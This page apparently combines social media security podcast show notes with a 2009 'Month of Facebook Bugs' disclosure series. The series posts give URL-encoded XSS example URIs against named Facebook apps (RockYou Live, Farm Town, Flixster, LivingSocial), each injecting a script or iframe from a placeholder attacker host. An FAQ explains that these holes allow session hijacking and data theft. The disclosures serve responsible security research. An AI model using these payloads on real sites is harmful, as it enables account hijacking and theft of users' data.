Social Media Security Podcast 23 – Recent Changes to Facebook, Enterprise Social Media Tools, Spokeo

This is the 23rd episode of the Social Media Security Podcast recorded February 25th, 2011.  This episode was hosted by Tom Eston and Scott Wright. Below are the show notes, links to articles and news mentioned in the podcast:

Please send any show feedback to feedback [aT] socialmediasecurity.com or comment below.  You can also call our voice mail box at 1-613-693-0997 if you have a question for our Q&A section on the next episode.  You can also subscribe to the podcast in iTunes and follow us on Twitter.  Thanks for listening!

Social Media Security Podcast 2 – Month of Facebook Bugs, What is XSS, Canadian Privacy Ruling

skullThis is the second episode of the Social Media Security Podcast recorded September 25, 2009.  This episode was hosted by Scott Wright, Tom Eston and our new co-host Kevin Johnson.  Below are the show notes, links to articles and news mentioned in the podcast:

  • Introducing our new co-host, Kevin Johnson.  Kevin is a Senior Security Analyst for InGuardians and is also an instructor for the SANS Institute, teaching both SEC504: Hacker Techniques, Exploits, and Incident Handling and SEC542: Web App Penetration Testing and Ethical Hacking courses.
  • Tom talks about the Month of Facebook Bugs (created by a security researcher called “theharmonyguy”) why this is important and how many vulnerable applications have been exploited and fixed so far.  Here is the list of top Facebook applications that Tom mentioned in the podcast.
  • Kevin gives a great non-technical overview of a web application vulnerability called Cross-site Scripting (XSS). Many of the Facebook applications we found in the “month of Facebook bugs” were vulnerable to XSS.  Kevin describes what XSS is, how it works and how dangerous this vulnerability is to social networking applications like Facebook.
  • Scott talks about the recent ruling regarding the Canadian Federal Privacy Commissioner vs. Facebook.  This ruling in Canada has created wide reaching changes to privacy and the way applications function within Facebook.
  • Scott also included a brief interview with the Canadian Privacy Commissioner’s Office about this recent Facebook ruling.
  • Tom has updated his Facebook Privacy & Security Guide.  You can download the latest version here.

Please send any show feedback to feedback [aT] socialmediasecurity.com or comment below.  You can also call our voice mail box at 1-613-693-0997 if you have a question for our Q&A section on the next episode.  You can also subscribe to the podcast now in iTunes! Thanks for listening!

Quick Update on FAXX Hacks

I did not post a FAXX hack on Monday for two reasons. First, I had forgotten to factor in the long weekend (Monday is Labor Day in the US) when notifying developers, hence posting would not have allowed an actual business day to pass before releasing details. Second, I spent most all of Saturday and again Monday in bed. I haven’t been terribly sick, but I’ve been dealing with tiredness and weakness.

None of this means I’ve hit a point where I lack for material. To make up for Monday’s omission, I will be posting two hacks one day this week. I may take another break on Tuesday to ensure developers have time to patch holes, but if that happens, I’ll simply post two hacks on a second day as well. The “month of Facebook bugs” is far from over.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: RockYou Live

Facebook Verified Application

Current Monthly Active Users: 9,767,698

Current Rank on Application Leaderboard: 17

Application Developer: RockYou!

Responsiveness: After announcing this series, a Facebook security contact got in touch and requested more information. I complied, and apparently RockYou! issued a patch after receiving word from Facebook, as I’ve not heard from them but can no longer replicate the issue.

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/superwall/stickers_mainpage.php?type=cards&_ryfbe=fb-wall-header-stickers&msg=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffb.rockyou.com%2Ffacebook_apps%2Frywall%2Fstickers_mainpage.php%3Ftype%3Dcards%26_ryfbe%3Dfb-wall-header-stickers%26msg%3D%2522%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%2522%253E%253C%252Fscript%253E

Notes: When I first figured out how to take advantage of XSS holes in FBML applications, I tried inserting a script element, as shown here. This worked with RockYou Live, but later applications included scripts prior to the insertion point. When taken out of the context of apps.facebook.com, these scripts would generate errors, and the inserted script would fail to execute. I then resorted to inserting another iframe which loaded a special HTML file that included the necessary script payload. Previous FAXX examples use this more reliable trick.

By the way, RockYou Live was also among the worst performers in my privacy policy survey a few weeks back.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Farm Town

Current Monthly Active Users: 18,638,429

Current Rank on Application Leaderboard: 7

Application Developer: Slashkey

Responsiveness: Slashkey reported that they went through their codebase and encoded all URI parameters after receiving word of the problem.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/farmtown/select_friends/?type=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%253A%252F%252Fl1.slashkey.com%252Ffacebook%252Ffarm%252Fselect_friends%252F%253Ftype%253D%252522%25252F%25253E%25253Ciframe%252Bsrc%25253D%252522http%25253A%25252F%25252FEVILURI%25252F%252522%25253E%2526select%253Dfarm%22%2F%3E&select=farm

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Movies (Flixster)

Facebook Verified Application

Current Monthly Active Users: 19,392,931

Current Rank on Application Leaderboard: 6

Application Developer: Flixster

Responsiveness: As of Sep. 4, the hole remains and I’ve had no word from Flixster. I received an e-mail from Flixster this evening confirming a fix.

Vulnerability Status: Unpatched Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/flixster/auth/account-merge?from=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fbk.flixster.com%2Ffacebook%2Fauth%2Faccount-merge%3Ffrom%3D%2522%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: LivingSocial

I originally planned on posting a different application today, but since that hole remains unpatched, I decided to wait another day and simply move down the leaderboard with a vulnerability I found yesterday.

Facebook Verified Application

Current Monthly Active Users: 23,688,212

Current Rank on Application Leaderboard: 3

Application Developer: LivingSocial

Responsiveness: LivingSocial responded within half an hour to let me know the hole was patched.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: hxxp://apps.facebook.com/livingsocial/micro/ad_manager/t/frame?campaign=%22)%3B%3C%2Fscript%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.livingsocial.com%2Fmicro%2Fad_manager%2Ft%2Fframe%3Fcampaign%3D%2522)%253B%253C%252Fscript%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252EVILURI%252F%2522%253E%253Cscript%253Ex%253D(%2522%22%3E%3Cscript%3Ex%3D(%22

Notes: This example serves as a reminder to leave no page unexamined when looking for vulnerabilities.  The hijacked page is normally used in an iframe for serving ads within the application, but since it resides at the same location as the application itself, it can be accessed via apps.facebook.com to launch an attack.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAQs on FAXX and the “Month of Facebook Bugs”

Isn’t this a just month of Facebook Application Bugs? Not exactly. While each of the vulnerabilities occur in Facebook applications, a hacker can exploit each one in powerful ways and gain access to many Facebook features. Also, such attacks are made possible by the very structure of the Facebook Platform – the fact that any of these application holes allows the same type of attack demonstrates that the problem goes beyond specific applications.

As long as the Platform remains in its current configuration, application-based attacks (FAXX = Facebook Application XSS/XSRF) will continue to be possible. I can ensure that 30 popular applications are patched, but if a 31st remains open, users are still vulnerable. If Facebook allows third-party applications to operate on their service, they cannot simply relegate security and privacy responsibilities to application developers.

These are all just XSS holes. What sort of attacks are possible with them? Each XSS hole lets an attacker hijack the session credentials of the current user, provided they’re logged into the application.  With those credentials, one can execute any Facebook API request that the application can make during the user’s session.

By default, this includes accessing a user’s full profile information, accessing the profile information of friends, accessing photos of a user or their friends, sending notifications to friends (with links), and posting feed stories on a user’s wall (with links). Notifications and feed stories would appear to come from the hijacked application. Some applications have extended permissions which can be exploited, such as updating a user’s status or publishing to their stream.

Finally, many applications allow for clickjacking installs, which means that users who have not already authorized the application (or who have exempted from the Platform altogether) are still vulnerable to an attack. I plan on releasing full source code demonstrating these attack vectors once the series comes to a close.

But the applications you do publish will be secure once they’re patched, right? Each time I evaluate an application, my goal is simply to find a hole. Once I’ve found one, I report it and move on to another application. Every application listed here could easily have other vulnerabilities that I have not yet found.

Will this really last an entire month? When I began this project, I had six holes ready to post.  Since starting the series two days ago, I’ve added two more to my list. I started by focusing on the most popular applications, meaning hundreds if not thousands have yet to be tested. Based on my experiences so far, I’m fairly confident that I will find 30 vulnerabilities by the time September finishes.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

1 2